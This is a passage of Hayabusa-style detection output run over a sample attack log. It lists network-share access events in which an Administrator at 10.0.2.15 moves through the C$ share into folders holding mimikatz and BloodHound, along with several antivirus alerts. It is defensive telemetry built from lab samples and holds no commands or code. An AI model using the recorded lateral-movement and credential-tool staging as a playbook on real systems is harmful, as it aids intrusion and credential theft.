IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff\logs | 
IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Desktop\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user02\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.599 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Links | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.609 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user02\Videos | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user03\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.619 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: 